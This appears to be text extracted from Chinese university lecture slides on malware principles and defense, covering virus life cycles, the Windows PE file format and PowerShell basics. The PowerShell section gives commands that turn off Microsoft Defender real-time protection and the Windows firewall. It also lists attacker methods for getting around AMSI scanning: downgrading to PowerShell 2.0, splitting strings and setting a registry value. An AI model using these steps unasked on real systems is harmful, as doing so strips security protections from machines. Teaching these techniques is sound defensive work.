計(jì)算機(jī)病毒的操作系統(tǒng)依賴性SILVERSTYLENetworkTalkPhotosLocation計(jì)算機(jī)病毒作為一種可執(zhí)行文件，其正確運(yùn)行依賴于操作系統(tǒng)及相應(yīng)的CPU指令集?？蓤?zhí)行文件必須符合某種二進(jìn)制格式，才能正確加載，初始化和啟動(dòng)程序?？蓤?zhí)行文件需要系統(tǒng)API支持。如果程序使用WindowsAPI，則不能在Linux上運(yùn)行，反之亦然。計(jì)算機(jī)體系結(jié)構(gòu)依賴文件系統(tǒng)及文件格式依賴文件格式——為了存儲信息而使用的對信息的特殊編碼方式，用于識別其中儲存的信息。每一類信息，可以一種或多種文件格式存儲于計(jì)算機(jī)中。每一種文件格式通常會有一種或多種擴(kuò)展名用以識別，也可能沒有擴(kuò)展名。擴(kuò)展名可以幫助應(yīng)用程序更好地識別文件格式。

基礎(chǔ)知識

文件系統(tǒng)及文件格式依賴相同的文件格式，如用不同程序處理則可能會產(chǎn)生截然不同的結(jié)果。對于DOC文件，用MicrosoftWord可看到其文本內(nèi)容，而以無格式方式在音樂播放軟件中播放，產(chǎn)生的則是噪聲。不同文件格式被設(shè)計(jì)用于存儲特殊的數(shù)據(jù)JPEG文件格式僅用于存儲靜態(tài)的圖像；GIF文件格式既可存儲靜態(tài)圖像，也可存儲簡單動(dòng)畫；HTML文件則可存儲帶有格式的文本；PDF格式則可存儲圖文并茂的文本。計(jì)算機(jī)病毒對文件系統(tǒng)及文件格式的依賴性計(jì)算機(jī)病毒為運(yùn)行于MacOS系統(tǒng)的Mach-O文件，則它將依賴于MacOS系統(tǒng)的文件系統(tǒng)APFS（AppleFileSystem）和Mach-O文件格式。計(jì)算機(jī)病毒所采用的文件格式，決定了其對相關(guān)文件格式的依賴。計(jì)算機(jī)病毒是運(yùn)行于Windows系統(tǒng)中的EXE文件，則該病毒對Windows系統(tǒng)的FAT32或NTFS文件系統(tǒng)以及PE文件格式具有依賴性。如缺乏該環(huán)境支持，計(jì)算機(jī)病毒將無法正常運(yùn)行。計(jì)算機(jī)病毒運(yùn)行的操作系統(tǒng)，決定了其對相應(yīng)文件系統(tǒng)的依賴。解釋環(huán)境依賴WindowsScriptHost解釋環(huán)境——Windows操作系統(tǒng)腳本語言程序的執(zhí)行環(huán)境。編譯對象后綴名為.vbs或.js的腳本類文件（包括計(jì)算機(jī)病毒）作用簡化日常工作流程制作一些實(shí)用的系統(tǒng)管理程序PowerShellCore管理任務(wù)通常由cmdlets執(zhí)行——行特定操作的專用.NET類可將cmdlet集合至腳本、可執(zhí)行文件（一般是獨(dú)立應(yīng)用程序）中通過常規(guī).NET類（或WMI/COM對象）實(shí)例化WindowsPowerShel允許訪問命令行工具和COM對象運(yùn)用.NETFramework類庫(FCL)的強(qiáng)大功能提供了帶有多種命令行工具的交互式環(huán)境進(jìn)行系統(tǒng)管理解釋環(huán)境依賴8計(jì)算機(jī)病毒生命周期計(jì)算機(jī)病毒生命周期計(jì)算機(jī)病毒生命周期指從病毒編寫誕生開始到病毒被獵殺的生命歷程，主要包括誕生、傳播、潛伏、發(fā)作、檢測、凋亡等階段。生命周期——一個(gè)對象的生老病死全過程，可通俗地理解為“從搖籃到墳?zāi)埂钡娜^程?；A(chǔ)知識誕生程序員及其團(tuán)隊(duì)在某種任務(wù)驅(qū)使下的協(xié)作產(chǎn)物潛伏避免安全軟件查殺隱匿、混淆、變形多態(tài)、加殼傳播附著體+傳播途徑文件寄生、實(shí)體注入、漏洞利用潛伏觸發(fā)條件滿足病毒啟動(dòng)、勒索加密、數(shù)據(jù)泄露、數(shù)據(jù)銷毀、軟硬件破壞計(jì)算機(jī)病毒生命周期——病毒攻擊階段計(jì)算機(jī)病毒生命周期病毒檢測從特征碼檢測、啟發(fā)式檢測、虛擬沙箱檢測、數(shù)據(jù)驅(qū)動(dòng)檢測、基于ChatGPT的安全防御方法及時(shí)檢測病毒、實(shí)時(shí)遏制病毒、有效保障數(shù)據(jù)安全病毒防御階段病毒凋亡

檢測可疑文件、進(jìn)程，確認(rèn)是否為計(jì)算機(jī)病毒所感染。圍堵獵殺計(jì)算機(jī)病毒，保障信息系統(tǒng)安全。目的1計(jì)算機(jī)病毒起源2計(jì)算機(jī)病毒定義3計(jì)算機(jī)病毒特性4計(jì)算機(jī)病毒類型5計(jì)算機(jī)病毒結(jié)構(gòu)6計(jì)算機(jī)病毒進(jìn)化7計(jì)算機(jī)病毒環(huán)境8計(jì)算機(jī)病毒生命周期本章小結(jié)作業(yè)簡述計(jì)算機(jī)病毒定義及相關(guān)起源。2.簡述計(jì)算機(jī)病毒類型及相關(guān)特性。3.

簡述計(jì)算機(jī)病毒進(jìn)化發(fā)展史。4.簡述計(jì)算機(jī)病毒所依賴的外部環(huán)境。5.簡述計(jì)算機(jī)病毒生命周期及其對病毒防御的意義。6.Sysinternals實(shí)用工具下載https:///zh-cn/sysinternals/downloads/Deadline：2023-9-11Email：344248003@ThankYou惡

意

代

碼

原

理

與

防

范

MalwarePrinciples&Prevention計(jì)算機(jī)病毒技術(shù)及其防御

ComputerVirusTechnology&ItsDefenseBasicsofComputerViruses計(jì)算機(jī)病毒基礎(chǔ)知識第二章ChapterTwo前言PREFACE如果要學(xué)習(xí)、掌握計(jì)算機(jī)病毒與反病毒技術(shù)，必須要先學(xué)習(xí)了解與計(jì)算機(jī)病毒相關(guān)的基礎(chǔ)知識。計(jì)算機(jī)病毒基礎(chǔ)知識包羅萬象，本章遵循“微觀—宏觀”的認(rèn)知與敘事邏輯，選擇了其中重要而應(yīng)用廣泛的基礎(chǔ)知識予以介紹，主要包括WindowsPE文件格式、Powershell基礎(chǔ)、Windows內(nèi)核機(jī)制等。合抱之木，生于毫末；九層之臺，起于累土；千里之行，始于足下?！呵铩だ疃独献印?WindowsPE文件格式目錄2Powershell基礎(chǔ)3Windows內(nèi)核機(jī)制1WindowsPE文件格式WindowsPE簡介WindowsPE文件基本概念WindowsPE格式WindowsPE簡介借鑒性兼容性WindowsPE文件格式主要借鑒UNIX操作系統(tǒng)所采用的COFF（CommonObjectFileFormat，通用對象文件格式）規(guī)范。WindowsPE文件格式保留了MS-DOS系統(tǒng)中熟悉的MZ頭部，以確保兼容之前的MS-DOS操作系統(tǒng)。WindowsPE（PortableExecutable，可移植可執(zhí)行）文件是Windows系統(tǒng)引入并使用的標(biāo)準(zhǔn)的可執(zhí)行文件格式?；A(chǔ)知識PE文件基本概念在識別一個(gè)文件是否為PE文件時(shí)，不應(yīng)只看文件后綴名，而應(yīng)借助PE文件指紋：“MZ”和“PE”。使用010Editor打開一個(gè)EXE文件，可發(fā)現(xiàn)文件的頭兩個(gè)字節(jié)都是“MZ”，而在0x3C位置處保存著一個(gè)地址，查看該地址發(fā)現(xiàn)保存著“PE”。通過這兩個(gè)PE文件指紋，可基本判定為PE文件。PE文件指紋PE文件基本概念PE文件結(jié)構(gòu)WindowsPE文件格式被組織為一個(gè)線性的數(shù)據(jù)流，主要包括4大部分：DOS部分，PE文件頭，節(jié)表，節(jié)數(shù)據(jù)。PE文件基本概念PE磁盤文件PE內(nèi)存映像對于磁盤文件，文件數(shù)據(jù)一般以1個(gè)磁盤扇區(qū)（512=0x200字節(jié)）對齊方式存儲。PE磁盤文件中塊的大小為0x200

的整數(shù)倍。對于加載至內(nèi)存中的文件映像，一般以1個(gè)內(nèi)存分頁（4096=0x1000字節(jié)）對齊方式存儲。PE內(nèi)存映像中塊的大小為0x1000

的整數(shù)倍，映射后實(shí)際數(shù)據(jù)的大小不變，塊中剩余部分用0填充。PE文件結(jié)構(gòu)1）DOS頭2）DOS存根3）PE文件頭4）節(jié)表PE文件格式WindowsPE文件所有與加載及運(yùn)行相關(guān)的信息都體現(xiàn)在PE文件結(jié)構(gòu)中。

PE文件結(jié)構(gòu)如下DOS頭在32位系統(tǒng)中DOS頭成為冗余數(shù)據(jù)，但有兩個(gè)重要成員（PE文件指紋）：e_magic字段（偏移0x0）:保存DOS簽名“MZ”（0x4D5A）。e_lfanew字段（偏移0x3C）:保存PE文件頭地址，可通過這個(gè)地址找到PE文件頭及其標(biāo)識“PE”。DOS頭是WindowsPE文件起始部分，是DOS時(shí)代遺留的產(chǎn)物，大小為64字節(jié)（0x00-0x3F）。PE文件格式DOS存根區(qū)域大小為112字節(jié)（0x40-0xAF），其數(shù)據(jù)由鏈接器自動(dòng)填充（也可填充任意數(shù)據(jù)），是一段可以在DOS下運(yùn)行的代碼，用于向終端輸出一行提示信息：ThisprogramcannotberuninDOSmode為兼容DOS系統(tǒng)，PE文件格式增加了DOS存根（DOSStub）部分。PE文件格式DOS存根PE文件頭PE文件頭（NT頭）是真正的Win32程序格式頭部，其中包括PE格式的各種信息，用于指導(dǎo)系統(tǒng)如何裝載和執(zhí)行此程序代碼。PE文件頭的結(jié)構(gòu)體IMAGE_NT_HEADER中還包含兩個(gè)其它結(jié)構(gòu)體，占用248字節(jié)，IMAGE_NT_HEADER結(jié)構(gòu)體如下。PE文件格式PE文件頭SignaturePE文件頭的第一個(gè)字段：類似于DOS頭中的e_magic，其高16位是0，低16是0x00004550，用ASCII碼字符表示為“PE00”，用于標(biāo)識PE文件頭的開始。PE文件格式PE文件頭的第二個(gè)字段：定義了PE文件的一些基本信息和屬性，這些屬性會在PE加載器加載時(shí)用到，如果加載器檢測到PE文件頭中定義的一些屬性不滿足當(dāng)前運(yùn)行環(huán)境，將會終止加載該P(yáng)E文件。IMAGE_FILE_HEADER大小為20字節(jié)，在微軟的官方文檔中被稱為標(biāo)準(zhǔn)通用對象文件格式（CommonObjectFileFormat，COFF）。PE文件頭FileHeaderPE文件格式PE文件頭的第三個(gè)字段：PE可選頭，盡管稱為可選頭，但其實(shí)是不可或缺的字段。在不同系統(tǒng)平臺下，其結(jié)構(gòu)體表示不一樣。在

32位下是IMAGE_OPTIONAL_HEADER32在64位下是IMAGE_OPTIONAL_HEADER64PE文件頭OptionalHeaderPE文件格式PE可選頭中重要的字段為：IMAGE_OPTIONAL_HEADER結(jié)構(gòu)體的大小由IMAGE_FILE_HEADER結(jié)構(gòu)的SizeOfOptionalHeader字段記錄。為簡單起見，以32位IMAGE_OPTIONAL_HEADER32說明如下：PE文件頭OptionalHeaderMagic：表示文件類型。32為PE文件數(shù)值為0x010B，64位PE文件數(shù)值為0x020B，ROM映像文件數(shù)值為0x0107。AddressOfEntryPoint：表示程序入口的相對虛擬地址（RelativeVirtualAddress，RVA）。在大多數(shù)可執(zhí)行文件中，該地址不直接指向Main、WinMain或DLLMain

函數(shù)，而指向運(yùn)行時(shí)的庫代碼并由它來調(diào)用上述函數(shù)。ImageBase：表示內(nèi)存鏡像基址，通常為0x00400000，也可在鏈接時(shí)自己設(shè)置；ImageBase+AddressOfEntryPoint=程序?qū)嶋H運(yùn)行入口地址（使用OllyDBG調(diào)試程序時(shí)就是從這個(gè)地址開始運(yùn)行）。SectionAlignment：表示內(nèi)存對齊數(shù)值，一般為內(nèi)存頁大小4KB。FileAlignment：表示磁盤文件對齊數(shù)值，一般為扇區(qū)大小512字節(jié)，現(xiàn)在也多4KB。NumberOfRvaAndSizes：表示數(shù)據(jù)目錄項(xiàng)數(shù)目。DataDirectory[16]：數(shù)據(jù)目錄表，由數(shù)個(gè)相同的IMAGE_DATA_DIRECTORY結(jié)構(gòu)組成，指向輸出表、輸入表、資源塊，重定位表等。PE文件格式

節(jié)表節(jié)類似于容器，用于存儲PE文件的真正程序部分（代碼和數(shù)據(jù)），且每個(gè)節(jié)可擁有獨(dú)立的內(nèi)存權(quán)限、節(jié)的名字。如果PE文件頭的NumberOfSections值中有N個(gè)節(jié)，則節(jié)表就由N個(gè)IMAGE_SECTION_HEADER結(jié)構(gòu)組成。每個(gè)IMAGE_SECTION_HEADER結(jié)構(gòu)大小為40字節(jié)，存儲了它所關(guān)聯(lián)的節(jié)的信息，例如位置、長度、屬性等。PE文件中的代碼數(shù)據(jù)按照不同屬性存在不同的節(jié)中PE文件格式節(jié)表Name[8]：表示節(jié)的名字，如.text、.data等。VirtualSize：表示加載到內(nèi)存中實(shí)際節(jié)的大?。▽R前）。VirtualAddress：表示該節(jié)裝載到內(nèi)存中的RVA（內(nèi)存對齊后，數(shù)值總是SectionAlignment的整數(shù)倍）。SizeOfRawData：表示該節(jié)在文件中所占的空間（文件對齊后），VirtualSize的值可能會比SizeOfRawData大，如bss節(jié)（SizeOfRawData為0）。PointerToRawData：表示該節(jié)在文件中的偏移（FOA）。Characteristics：表示節(jié)的屬性，如代碼/數(shù)據(jù)、可讀/可寫等。節(jié)表結(jié)構(gòu)體中重要的字段為：PE文件格式節(jié)表VA（VirtualAddress）表示虛擬內(nèi)存地址。RVA（RelativeVirtualAddress）表示相對虛擬地址，即相對于基地址的偏移地址。FOA（FileOffsetAddress）表示文件偏移地址。RVA與FOA的轉(zhuǎn)換RVAFOA：①計(jì)算RVA=VA-ImageBase；②若RVA位于PE頭部（DOS頭、DOSStub、PE頭、節(jié)表），則FOA==RVA；③判斷RVA位于哪個(gè)節(jié)：如RVA>=節(jié).VirtualAddress

（節(jié)在內(nèi)存對齊后RVA）且RVA<=節(jié).VirtualAddress+當(dāng)前節(jié)內(nèi)存對齊后的大小，則偏移量=RVA-節(jié).VirtualAddress；④FOA=節(jié).PointerToRawData+偏移量；對于計(jì)算機(jī)病毒來說，由于已設(shè)初始值的全局變量，其初始值會存儲在PE文件中。PE文件格式在創(chuàng)建一個(gè)動(dòng)態(tài)鏈接庫（DynamicLinkLibrary，DLL）時(shí)，實(shí)際上創(chuàng)建了一組能讓EXE文件或其他DLL調(diào)用的函數(shù)。DLL文件通過輸出表（ExportTable）向系統(tǒng)提供輸出函數(shù)名、序號和入口地址等信息。輸出表是一個(gè)40字節(jié)的結(jié)構(gòu)體IMAGE_EXPORT_DIRECTORY。節(jié)表輸出表（導(dǎo)出表）節(jié)表輸出表（導(dǎo)出表）輸出表中的輸出函數(shù)名、序號和入口地址的查詢?nèi)缟蠄D。當(dāng)PE文件加載至內(nèi)存后，Windows系統(tǒng)將相應(yīng)的DLL文件裝入，EXE文件通過“輸入表”找到相應(yīng)的DLL中的導(dǎo)入函數(shù)，從而完成程序的正常運(yùn)行。當(dāng)前文件依賴幾個(gè)DLL模塊，就會有幾個(gè)輸入表且連續(xù)排列直到連續(xù)出現(xiàn)20個(gè)0結(jié)束。輸入表是一個(gè)20字節(jié)的結(jié)構(gòu)體IMAGE_IMPORT_DESCRIPTOR。節(jié)表輸入表（導(dǎo)入表）節(jié)表輸入表（導(dǎo)入表）NameOriginalFirstThunkDLL（依賴模塊）名字的指針，一個(gè)以“00”結(jié)尾的ASCII字符的RVA地址。重要字段

指向輸入名稱表（ImportedNameTable,INT）的RVA。INT是一個(gè)IMAGE_THUNK_DATA結(jié)構(gòu)的數(shù)組，數(shù)組中的每個(gè)IMAGE_THUNK_DATA結(jié)構(gòu)都指向IMAGE_IMPORT_BY_NAME結(jié)構(gòu)，數(shù)組以一個(gè)內(nèi)容為0的IMAGE_THUNK_DATA結(jié)構(gòu)結(jié)束。節(jié)表輸入表（導(dǎo)入表）FirstThunk指向輸入地址表（ImportedAddressTable,IAT）的RVA。IAT是一個(gè)IMAGE_THUNK_DATA結(jié)構(gòu)的數(shù)組。IMAGE_THUNK_DATA結(jié)構(gòu)實(shí)際只占4字節(jié)。重要字段

如果IMAGE_THUNK_DATA32的最高位為1，則低31位代表函數(shù)的導(dǎo)出序號，否則4個(gè)字節(jié)是一個(gè)RVA，指向IMAGE_IMPORT_BY_NAME結(jié)構(gòu)。IMAGE_IMPORT_BY_NAME結(jié)構(gòu)體僅有4個(gè)字節(jié)，存儲了一個(gè)輸入函數(shù)的相關(guān)信息。節(jié)表輸入表（導(dǎo)入表）INT和IAT內(nèi)容一致其實(shí)是PE文件未加載時(shí)的狀態(tài)，當(dāng)PE加載器將文件載入內(nèi)存后會向IAT填入真正的函數(shù)地址（GetProcAddress）。輸入表中的函數(shù)名稱及其入口地址的查詢轉(zhuǎn)換關(guān)系如圖所示。節(jié)表重定位表盡管在PE文件的可選頭中設(shè)置有ImageBase值，但如PE文件不在首選地址載入，則文件中的每一個(gè)絕對地址都需要重新修正。由于需修正的地址很多，可在文件中使用重定位表記錄這些絕對地址的位置。在載入內(nèi)存后，若載入基地址與ImageBase不同，則進(jìn)行修正這些地址，若相同則無需修正。重定位表由一個(gè)個(gè)的重定位塊組成，每個(gè)塊記錄了4KB（1頁）的內(nèi)存中需要重定位的地址。每個(gè)重定位數(shù)據(jù)塊的大小必須以DWORD（4字節(jié)）對齊。它們以一個(gè)IMAGE_BASE_RELOCATION結(jié)構(gòu)開始，格式定義如下：節(jié)表重定位表節(jié)表重定位表重定位類型定義節(jié)表重定位表盡管可能有多種重定位類型，但對x86可執(zhí)行文件來說，所有的基址重定位類型都是IMAGE_REL_BASED_HIGHLOW，即第3種類型，并會以IMAGE_REL_BASED_ABSOLUTE類型來結(jié)束重定位。IMAGE_REL_BASED_ABSOLUTE重定位什么都不做，只用于填充，以便下一個(gè)IMAGE_BASE_RELOCATION按4字節(jié)分界線對齊。對于IA-64可執(zhí)行文件，重定位類型似乎總是IMAGE_REL_BASED_DIR64。盡管IA-64的EXE頁大小是8KB，但基址重定位仍是4KB的塊。在執(zhí)行PE文件前，加載程序在進(jìn)行重定位時(shí)，會用PE文件在內(nèi)存中的實(shí)際映像地址減PE文件所要求的映像地址，根據(jù)重定位類型的不同，將差值添加到相應(yīng)的地址數(shù)據(jù)中。由此可見，重定位表的作用為：PE文件加載至內(nèi)存后，通過重定位表記錄的RVA找到需要重定位的數(shù)據(jù)。重定位表通過“頁基址RVA+頁內(nèi)偏移地址”方式得到一個(gè)完整RVA，以減小表的大小。節(jié)表重定位表Windows程序的各種界面稱為資源，包括加速鍵（Accelerator）、位圖（Bitmap）、光標(biāo)（Cursor）、對話框（DialogBox）、串表（StringTable）、工具欄（Toolbar）和版本信息（VersionInformation）等。定義資源時(shí)，既可用字符串作為名稱來標(biāo)識一個(gè)資源，也可通過ID號來標(biāo)識資源。節(jié)表資源表節(jié)表資源表DataDirectory[16]數(shù)據(jù)目錄表中的第3個(gè)成員指向資源表（ResourceTable），不是直接指向資源數(shù)據(jù)，而是以磁盤目錄形式定位資源數(shù)據(jù)。資源表是一個(gè)四層的二叉排序樹結(jié)構(gòu)，如圖所示。每一個(gè)節(jié)點(diǎn)都是由資源目錄結(jié)構(gòu)和緊隨其后的數(shù)個(gè)資源目錄項(xiàng)結(jié)構(gòu)組成的，兩種結(jié)構(gòu)組成了一個(gè)資源目錄結(jié)構(gòu)單元（目錄塊），如圖所示。節(jié)表資源表節(jié)表資源表資源目錄結(jié)構(gòu)（IMAGE_RESOURCE_DIRECTORY）占16字節(jié)節(jié)表資源表資源目錄項(xiàng)結(jié)構(gòu)（IMAGE_RESOURCE_DIRECTORY_ENTRY），占8字節(jié)，包含2個(gè)字段。Powershell基礎(chǔ)PowerShell簡介PowerShell基本概念PowerShell安全技術(shù)2Powershell簡介定義兩面性Powershell是一種功能強(qiáng)大的腳本語言和Shell程序框架，用于取代默認(rèn)命令提示符，便于系統(tǒng)管理員更靈活便利地管理計(jì)算機(jī)系統(tǒng)。Powershell既是管理者的工具，也是攻擊者的利器，已被廣泛用于不同規(guī)模的網(wǎng)絡(luò)攻擊載體—計(jì)算機(jī)病毒的設(shè)計(jì)中，無論是下載器、內(nèi)網(wǎng)橫向移動(dòng)，還是權(quán)限維持，都可見Powershell技術(shù)的身影?；A(chǔ)知識

Powershell簡介Powershell的特性強(qiáng)大的管理功能。支持管道操作。支持網(wǎng)絡(luò)和遠(yuǎn)程處理。支持對象操作、后臺異步運(yùn)行。Powershell基于.Net架構(gòu)，既兼容原CMD命令提示符的所有功能，又吸收了Linux系統(tǒng)中Bash命令行的諸多優(yōu)點(diǎn)。由于Powershell具有廣泛的Windows內(nèi)部訪問權(quán)限，系統(tǒng)管理員經(jīng)常使用它來管理和配置操作系統(tǒng)，并自動(dòng)完成復(fù)雜的任務(wù)。Powershell簡介攻擊者利用Powershell可實(shí)現(xiàn)創(chuàng)建在內(nèi)存中運(yùn)行的無文件惡意代碼。訪問操作系統(tǒng)調(diào)用以執(zhí)行復(fù)雜操作。加載惡意代碼至內(nèi)存中以實(shí)現(xiàn)持久化駐留。發(fā)現(xiàn)信息、收集和泄露數(shù)據(jù)。網(wǎng)絡(luò)橫向移動(dòng)以進(jìn)一步滲透攻擊。攻擊者也經(jīng)常使用內(nèi)置的Windows命令行和腳本工具來運(yùn)行其命令，Powershell已成攻擊者手頭必備工具之一。在技術(shù)層面上，Powershell通過應(yīng)用程序編程接口(API)、進(jìn)程(如WindowsManagementInstrumentation，WMI)和.Net框架享有訪問Windows操作系統(tǒng)的特權(quán)。Powershell可直接將Shellcode加載至內(nèi)存執(zhí)行，并使用模糊命令和反射注入以規(guī)避檢測與查殺。Powershell基本概念--(1)Powershell腳本Powershell腳本類似于CMD控制臺上的批處理文件，是包含Powershell代碼的文本文件。常用的Powershell擴(kuò)展名為.ps1、.psc1、.psd1和.psm1，分別表示通用腳本、命令行腳本、清單腳本和腳本模塊?？赏ㄟ^文本編輯工具創(chuàng)建Powershell腳本?；A(chǔ)知識

當(dāng)運(yùn)行Powershell腳本文件時(shí)，如只輸入腳本的文件名，則會報(bào)錯(cuò)。需要使用相對路徑或者絕對路徑方式來運(yùn)行Powershell腳本文件。Powershell基本概念--(1)Powershell腳本Powershell基本概念--(2)執(zhí)行策略為預(yù)防執(zhí)行惡意腳本，Powershell規(guī)定有相應(yīng)的執(zhí)行策略。Powershell腳本能否執(zhí)行取決于所設(shè)定的執(zhí)行策略。4個(gè)主要的執(zhí)行策略Restricted：腳本不能運(yùn)行（默認(rèn)設(shè)置）RemoteSigned：本地創(chuàng)建的腳本可運(yùn)行，但從網(wǎng)上下載的腳本不能運(yùn)行（擁有數(shù)字證書簽名除外）AllSigned：僅當(dāng)腳本由受信任的發(fā)布者簽名時(shí)才能運(yùn)行Unrestricted：權(quán)限最高，允許所有腳本運(yùn)行Powershell基本概念--(2)執(zhí)行策略查看Powershell所支持的執(zhí)行策略，可輸入如下命令[System.Enum]::GetNames([Microsoft.PowerShell.ExecutionPolicy])獲取Powershell當(dāng)前的執(zhí)行策略，可使用如下命令Get-ExecutionPolicy更改Powershell當(dāng)前執(zhí)行策略時(shí)，可使用如下命令Set-ExecutionPolicy[策略名]Powershell基本概念--(3)管道Powershell的管道作用是將一個(gè)命令的輸出作為另一個(gè)命令的輸入，兩個(gè)命令之間用管道符號“|”連接。管道的概念與真實(shí)生活中的生產(chǎn)線比較相似：在不同的生產(chǎn)環(huán)節(jié)進(jìn)行連續(xù)的再加工。在DOS系統(tǒng)的CMD控制臺中，也有管道的概念，例如，Dir|More可將結(jié)果進(jìn)行分屏顯示。CMD管道是基于文本的，Powershell管道則是基于對象的。Powershell基本概念--(3)管道如圖例中，“Get-ChildItem”是獲取當(dāng)前路徑的所有項(xiàng)目，“|Where-Object{$_.Length-gt5000000}”是查看上一步結(jié)果，取所有長度大于5000000的項(xiàng)目，“|Sort-Object-DescendingName”是查看上一步結(jié)果，按照Name進(jìn)行倒述排列。Powershell基本概念—(4)管理MicrosoftDefender防病毒軟件盡管Windows安全中心的“病毒和威脅防護(hù)”提供了日常的防病毒任務(wù)，但是有時(shí)在實(shí)驗(yàn)Powershell命令或運(yùn)行Powershell腳本時(shí)，會被MicrosoftDefender防病毒軟件查殺，以至于無法完成實(shí)驗(yàn)、達(dá)不到實(shí)驗(yàn)?zāi)康摹４藭r(shí)，可利用Powershell來管理MicrosoftDefender防病毒軟件?；A(chǔ)知識

Powershell基本概念—(4)管理MicrosoftDefender防病毒軟件如要使用Powershell檢查MicrosoftDefender的當(dāng)前狀態(tài)，可使用以下命令并確認(rèn)AntivirusEnabled為True。Powershell基本概念—(4)管理MicrosoftDefender防病毒軟件如要查詢并列出MicrosoftDefender的所有可用首選項(xiàng)，可使用如下命令以了解其防病毒軟件的所有設(shè)置盡管MicrosoftDefender提供了禁用防病毒軟件命令，但它受制于防篡改功能保護(hù)，可通過Windows安全中心提供的“病毒和威脅防護(hù)”設(shè)置來禁用它。禁用防病毒，請關(guān)閉“篡改防護(hù)”，并使用如下命令Set-MpPreference-DisableRealtimeMonitoring$true如需啟用防病毒軟件，則可使用如下命令Set-MpPreference-DisableRealtimeMonitoring$falsePowershell基本概念—(4)管理MicrosoftDefender防病毒軟件Powershell基本概念--(5)管理AMSIMicrosoft公司開發(fā)的AMSI（Anti-MalwareScanInterface，反惡意軟件掃描接口）是防御惡意軟件攻擊的一種解決方案。通常情況下，MicrosoftDefender防病毒軟件已自動(dòng)與AMSIAPI交互集成，以確保其能實(shí)時(shí)掃描Powershell腳本、WindowsScript腳本、VBScript腳本、JavaScript腳本、Jscript腳本等惡意腳本，防止任意執(zhí)行惡意代碼。當(dāng)腳本運(yùn)行時(shí)，AMSI會實(shí)時(shí)檢測腳本代碼，并通過接口將結(jié)果傳遞給Windows系統(tǒng)內(nèi)安裝的安全軟件。如安全軟件發(fā)現(xiàn)腳本代碼存在惡意特征，會攔截并中止腳本執(zhí)行?；A(chǔ)知識

AMSI與安全軟件有什么區(qū)別？無論惡意腳本是經(jīng)過多次混淆模糊處理還是遠(yuǎn)程執(zhí)行，AMSI都可在惡意腳本注入內(nèi)存前檢測出來，而安全軟件則不一定能檢測到。當(dāng)用戶執(zhí)行腳本或啟動(dòng)Powershell時(shí)，AMSI.dll將會動(dòng)態(tài)加載至內(nèi)存。在執(zhí)行腳本之前，防病毒軟件使用如下兩個(gè)API函數(shù)來掃描緩沖區(qū)和字符串以查找惡意軟件特征：AmsiScanBuffer()，AmsiScanString()。Powershell基本概念--(5)管理AMSIAMSI只是一個(gè)通道，真正檢測出是否為惡意腳本還需要安全軟件。Powershell基本概念--(5)管理AMSI目前，AMSI功能已集成至Windows10和WindowsServer2016系統(tǒng)中，位于C:\windows\system32\amsi.dll。Windows10系統(tǒng)中的如下組件已集成了AMSI：Powershell（System.Management.Automation.dll）UAC（UserAccoutControl，用戶賬戶控制），位于%windir%\System32\consent.exeWindows腳本宿主（wscript.exe、cscript.exe）JavaScript（%windir%\System32\jscript.dll）VBScript（%windir%\System32\vbscript.dll）OfficeVBA宏(VBE7.dll).NETAssembly（clr.dll）WMI（%windir%\System32\wbem\fastprox.dll）降級攻擊拆分字符禁用AMSI由于低版本(2.0)的Powershell中沒有集成AMSI，可執(zhí)行powershell.exe-version2降低版本2.0上執(zhí)行惡意腳本，這樣自然就不會被檢測到。當(dāng)Powershell腳本中含有敏感的特征字符時(shí)，拆分字符也是繞過AMSI檢測掃描的一種方法。通過修改注冊表，將HKCU\Software\Microsoft\WindowsScript\Settings\AmsiEnable的鍵項(xiàng)值設(shè)置為0Powershell基本概念--(5)管理AMSI為了繞過AMSI以免被檢測掃描，攻擊者在利用Powershell腳本時(shí)，通常會使用如下方法：Powershell基本概念--(6)管理防火墻為了保護(hù)系統(tǒng)免受未經(jīng)授權(quán)的傳入和傳出網(wǎng)絡(luò)連接的侵害，Windows系統(tǒng)內(nèi)置了防火墻管理系統(tǒng)。使用Windows防火墻，用戶可設(shè)置特殊規(guī)則來控制出站和入站的網(wǎng)絡(luò)連接。如Windows防火墻無法正常工作，或者安裝了第三方防火墻軟件，或者實(shí)驗(yàn)需要禁用/啟用Windows防火墻，可利用Powershell命令管理（禁用/啟用）Windows防火墻?；A(chǔ)知識

Powershell基本概念--(6)管理防火墻禁用Windows防火墻在任務(wù)欄的搜索框中輸入“Powershell”，在搜索結(jié)果中選擇“以管理員身份運(yùn)行”，打開Powershell。在Powershell窗口中，使用以下命令禁用WindowsDefender防火墻。Set-NetFirewallProfile-EnabledFalse啟用Windows防火墻如要啟用防火墻，需以管理員身份在Powershell窗口中運(yùn)行以下命令。Set-NetFirewallProfile-EnabledTruePowershell安全技術(shù)由于Powershell已集成于Windows系統(tǒng)，已成為攻擊者設(shè)計(jì)攻擊載體（計(jì)算機(jī)病毒）的一種常見安全技術(shù)。Powershell具有如下特性：無文件性Powershell無需磁盤文件，可直接從遠(yuǎn)程加載至內(nèi)存執(zhí)行，能防御多數(shù)安全軟件。離地攻擊性由于Powershell是已集成于Windows系統(tǒng)中的系統(tǒng)自帶的、受信任的工具，使攻擊者無需增加額外的工具，從而能有效規(guī)避安全軟件。易混淆性由于Powershell是一種腳本語言，易實(shí)現(xiàn)多種混淆方法，以對抗規(guī)避安全軟件。功能適應(yīng)性Powershell可支持WMI和.NET框架，且內(nèi)置了遠(yuǎn)程管理機(jī)制，可適應(yīng)于多種攻擊場景。Powershell混淆技術(shù)定義分類混淆就是將Powershell腳本程序代碼，轉(zhuǎn)換成一種功能上等價(jià)而又難于閱讀和理解的形式的行為，即故意模糊源代碼的行為，使人類或安全軟件難以理解。就其本質(zhì)而言，混淆完全改變了源代碼，但其仍在功能上等價(jià)于原始代碼。根據(jù)Powershell語法特征，混淆對象主要分為如下3類：⑴命令本身⑵函數(shù)與對象⑶參數(shù)針對上述對象，可分別采用不同的混淆技術(shù)?；A(chǔ)知識

